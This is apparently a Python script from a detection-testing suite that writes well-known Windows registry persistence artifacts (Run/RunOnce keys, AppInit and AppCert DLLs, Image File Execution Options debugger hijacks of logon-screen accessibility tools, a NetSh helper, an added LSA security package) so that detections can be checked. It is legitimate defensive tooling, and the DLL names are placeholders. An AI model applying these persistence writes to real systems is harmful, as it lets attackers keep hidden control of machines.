in cortado/rtas/registry_persistence_create.py [0:0]
def main() -> None:
    """Write a scripted set of registry persistence artifacts for detection testing.

    Each step writes one well-known persistence location and logs what it is
    doing, so a detection pipeline under test can be checked against the
    resulting registry events. The sequence visible here covers:

    * Run / RunOnce keys in both hives (Registry Run Keys, T1547.001)
    * AppInit_Dlls (T1546.010) and AppCertDlls (T1546.009)
    * Image File Execution Options "Debugger" values (T1546.012) for a list
      of commonly abused accessibility binaries
    * a NetSh helper DLL entry (T1546.007)
    * an extra entry appended to the LSA "Security Packages" list (T1547.005)

    Cleanup and timing are delegated to ``_common.write_to_registry`` via its
    ``restore``/``pause`` keyword arguments; their defaults are not visible in
    this file. Module-level names used here (``log``, ``_const``, ``_common``,
    ``TARGET_APP_EXE``, ``_winreg_calls``, ``pause``) are defined elsewhere.
    """
    log.info("Suspicious Registry Persistence")
    # NOTE(review): REG_HKLM is taken from _const but REG_HKCU from _common,
    # while every other hive reference in this function uses _const. Confirm
    # that _common really exports REG_HKCU, or whether this should read
    # _const.REG_HKCU.
    for hive in (_const.REG_HKLM, _common.REG_HKCU):
        # No restore= argument is passed for the Run/RunOnce writes, so whether
        # these values are cleaned up afterwards depends on the default of
        # _common.write_to_registry — TODO confirm the test leaves no residue.
        _common.write_to_registry(
            hive,
            "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\",
            "RunOnceTest",
            TARGET_APP_EXE,
        )
        _common.write_to_registry(
            hive,
            "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
            "RunTest",
            TARGET_APP_EXE,
        )
    # Defined elsewhere in the module; its behaviour is not visible here.
    _winreg_calls()
    # Additional persistence
    # AppInit_Dlls is a value under the "Windows" key; written with
    # restore=True so the original value is put back, and pause=True so the
    # change stays in place long enough to be observed (semantics of both flags
    # live in _common.write_to_registry).
    log.info("Adding AppInit DLL")
    windows_base = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\"
    _common.write_to_registry(_const.REG_HKLM, windows_base, "AppInit_Dlls", "evil.dll", restore=True, pause=True)
    # AppCertDlls: each value under this key names a DLL; here the value name
    # is "evil" and its data is "evil.dll".
    log.info("Adding AppCert DLL")
    appcertdlls_key = "System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls"
    _common.write_to_registry(_const.REG_HKLM, appcertdlls_key, "evil", "evil.dll", restore=True, pause=True)
    # Binaries that get an Image File Execution Options "Debugger" value
    # pointing at TARGET_APP_EXE. Apart from the first placeholder name, these
    # are the accessibility helpers reachable from the logon screen, which is
    # why IFEO hijacks of them are a classic detection target.
    debugger_targets = [
        "normalprogram.exe",
        "sethc.exe",
        "utilman.exe",
        "magnify.exe",
        "narrator.exe",
        "osk.exe",
        "displayswitch.exe",
        "atbroker.exe",
    ]
    for victim in debugger_targets:
        log.info("Registering Image File Execution Options debugger for %s -> %s" % (victim, TARGET_APP_EXE))
        # One subkey per target executable name.
        base_key = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s" % victim
        # restore=True but no pause= here, unlike the AppInit/AppCert writes.
        _common.write_to_registry(_const.REG_HKLM, base_key, "Debugger", TARGET_APP_EXE, restore=True)
    # create new NetSh key value
    # The helper path is a constructed, non-existent DLL; only the registry
    # artifact matters for the test. No restore= is passed on this call.
    log.info("Adding a new NetSh Helper DLL")
    key = "Software\\Microsoft\\NetSh"
    _common.write_to_registry(_const.REG_HKLM, key, "BadHelper", "c:\\windows\\system32\\BadHelper.dll")
    # modify the list of SSPs
    # "Security Packages" is a REG_MULTI_SZ list; append=True adds "evilSSP"
    # to the existing entries rather than replacing them, so LSA's real
    # package list is kept intact. Whether this write is restored afterwards
    # depends on the default of _common.write_to_registry — TODO confirm.
    log.info("Adding a new SSP to the list of security packages")
    key = "System\\CurrentControlSet\\Control\\Lsa"
    _common.write_to_registry(
        _const.REG_HKLM,
        key,
        "Security Packages",
        ["evilSSP"],
        _const.MULTI_SZ,
        append=True,
        pause=True,
    )
    # Final hold before returning; `pause` is a module-level name, presumably
    # the same helper the pause=True arguments above rely on — verify.
    pause()